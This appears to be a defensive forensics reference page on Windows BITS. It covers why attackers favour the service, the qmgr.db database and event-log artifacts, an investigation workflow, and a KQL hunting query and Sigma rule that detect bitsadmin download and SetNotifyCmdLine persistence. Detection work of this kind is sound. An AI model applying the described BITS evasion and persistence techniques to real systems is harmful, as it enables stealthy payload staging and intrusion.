Artifact Analysis: BITS (Background Intelligent Transfer Service)
1. The Adversarial Appeal of BITS
Section titled “1. The Adversarial Appeal of BITS”To understand why BITS is a staple in modern cyberattacks (from ransomware affiliates to APTs), analysts must look at its architectural advantages:
- Trusted Execution (Firewall Evasion): BITS transfers are executed by a legitimate Windows service hosted within
svchost.exe -k netsvcs. Host-based firewalls and EDRs rarely block outbound HTTP/HTTPS traffic originating from this core OS process, making it an ideal proxy for fetching malicious payloads. - Extreme Resilience: BITS is designed to handle network interruptions. If a machine reboots or loses connection, the BITS job is paused and will automatically resume once connectivity is restored. This provides built-in persistence for the download/upload process.
- Stealth (Idle Bandwidth): BITS prioritizes user experience by only utilizing “idle” bandwidth. This prevents massive network spikes that would typically alert network monitoring tools (NDR) during data exfiltration.
- Command Execution (Persistence): BITS supports a feature called
SetNotifyCmdLine. An attacker can configure a BITS job to execute a specific command or script immediately after a transfer finishes or fails, transforming a simple download manager into a highly reliable persistence mechanism.
2. Artifact Location & Structure
Section titled “2. Artifact Location & Structure”BITS activity is primarily tracked in two locations: an internal database and dedicated Windows Event Logs.
A. The BITS Database (qmgr.db)
Section titled “A. The BITS Database (qmgr.db)”The core forensic artifact is the active queue manager database.
- Path:
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db(Older systems may useqmgr0.datandqmgr1.dat). - Format: Extensible Storage Engine (ESE) database.
- Forensic Value: This database retains a historical record of BITS jobs. Extracting and parsing this file reveals:
- The Job Name and Description.
- The Source URL (the external C2 or staging server).
- The Destination Path (where the payload was dropped on disk).
- Timestamps (Creation, Modification, Completion).
- Notification Command Line (Any payload executed upon job completion).
- The User SID of the account that requested the job.
B. Windows Event Logs
Section titled “B. Windows Event Logs”BITS maintains an operational log that tracks the lifecycle of every transfer.
- Log Path:
Applications and Services Logs > Microsoft > Windows > Bits-Client > Operational - Key Event IDs:
- Event ID 59: BITS started a transfer job. (Contains the URL and destination file).
- Event ID 60: BITS stopped transferring data. (Indicates completion or failure).
- Event ID 16411: (On modern Windows 10/11) Provides rich context, including the name of the process that initiated the job request.
3. DFIR Investigation Strategy
Section titled “3. DFIR Investigation Strategy”When investigating a suspected compromise, BITS analysis provides the critical link between network activity and file execution.
- Acquire & Parse the Database: Because
qmgr.dbis an active ESE database, it is locked by the OS. Analysts must use a raw disk reader or Volume Shadow Copy (VSS) to acquire it. Once acquired, use a specialized tool likeBitsParseror KAPE to convert the ESE tables into a human-readable CSV. - Analyze Artifacts: Review the parsed database for anomalous destination extensions. A BITS job that downloads a
.dator.txtfile but saves it to disk asC:\Users\Public\update.exeis a definitive indicator of compromise. - Cross-Artifact Correlation:
- Network Pivot: Take the extracted Source URLs and query your proxy/firewall logs to identify other infected hosts.
- Execution Pivot: Take the Destination Path and query Prefetch (.pf) and Amcache to prove whether the dropped payload was subsequently executed.
4. Detection & Threat Hunting
Section titled “4. Detection & Threat Hunting”While parsing the database is a post-mortem activity, SOC analysts can proactively hunt for BITS abuse by monitoring process execution telemetry. Adversaries typically interact with BITS using the bitsadmin.exe legacy tool or the modern Start-BitsTransfer PowerShell cmdlet.
// Detects suspicious usage of bitsadmin.exe and PowerShell BITS cmdletsDeviceProcessEvents| where ProcessCommandLine has_any ("bitsadmin", "Start-BitsTransfer")// Look for common malicious flags (Transfer, Download, AddFile, SetNotifyCmdLine)| where ProcessCommandLine has_any ("/transfer", "/create", "/addfile", "/SetNotifyCmdLine")// Filter out expected administrative scripts if necessary| where InitiatingProcessFileName !in~ ("sccm.exe", "msiexec.exe")| project TimeGenerated, DeviceName, InitiatingProcessAccountName, FileName, ProcessCommandLine| sort by TimeGenerated desctitle: Suspicious Download via BITSAdminid: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6dstatus: stabledescription: Detects the usage of bitsadmin.exe to download files, a common LOLBAS technique for payload staging.logsource: category: process_creation product: windowsdetection: selection: Image|endswith: '\bitsadmin.exe' CommandLine|contains|all: - '/transfer' - 'http' # Optional: Add condition to detect SetNotifyCmdLine for persistence selection_persist: Image|endswith: '\bitsadmin.exe' CommandLine|contains: '/SetNotifyCmdLine' condition: selection or selection_persistlevel: hightags: - attack.defense_evasion - attack.t1197References & Further Reading
Section titled “References & Further Reading”- LOLBAS Project: BITSAdmin.exe
- FireEye / Mandiant: Tracking Malware with BITS
- Related Artifact: Event ID 4688 (Process Creation)
- Related Artifact: Amcache & RecentFileCache